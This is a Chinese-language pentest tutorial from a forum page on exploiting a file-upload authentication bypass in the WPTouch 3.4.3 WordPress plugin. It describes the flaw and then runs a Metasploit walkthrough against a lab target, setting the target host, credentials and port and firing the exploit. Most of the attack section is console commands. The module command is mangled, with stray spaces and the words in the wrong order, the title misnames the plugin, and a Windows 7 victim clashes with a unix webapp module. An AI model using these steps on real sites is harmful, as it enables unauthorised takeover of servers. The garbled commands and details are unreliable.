渗透测试实战教程:利用WordPressWpToud插件的文件上传漏洞绕过身份验证的上传任意文件

WordPress WPTouch插件包含绕过身份验证的文件上传漏洞。在后端索引页面上创建wp-nonce(CSRF令牌),并使用相同的令牌通过插件处理ajax文件上传。通过上传捕获的随机数,我们可以将任意文件上传文件夹中。因为插件也使用它自己的文件上传机制而不是wordpress api,所以可以上传任何文件类型。提供的用户不需要特殊权限,具有“贡献者”角色的用户可能会被滥用。
利用目标
Wp touch 3.4.3
需求
攻击者:kali Linux
受害者PC:Windows 7
打开Kali终端类型  msfconsole
利用WordPressWpToud插件的文件上传漏洞
现在输入  exploit use / unix / webapp / wp_ wptouch_file_upload
msf exploit (wp_wptouch_file_upload)>set targeturi /wordpress
msf exploit (wp_wptouch_file_upload)>set rhost 192.168.0.110 (IP of Remote Host)
msf exploit (wp_wptouch_file_upload)>set username admin
msf exploit (wp_wptouch_file_upload)>set password admin123
msf exploit (wp_wptouch_file_upload)>set rport 80
msf exploit (wp_wptouch_file_upload)>exploit
利用WordPressWpToud插件的文件上传漏洞
转载请注明本文链接: http://www.mayidui.net/t2318.html
游客
登录后才可以回帖,登录 或者 注册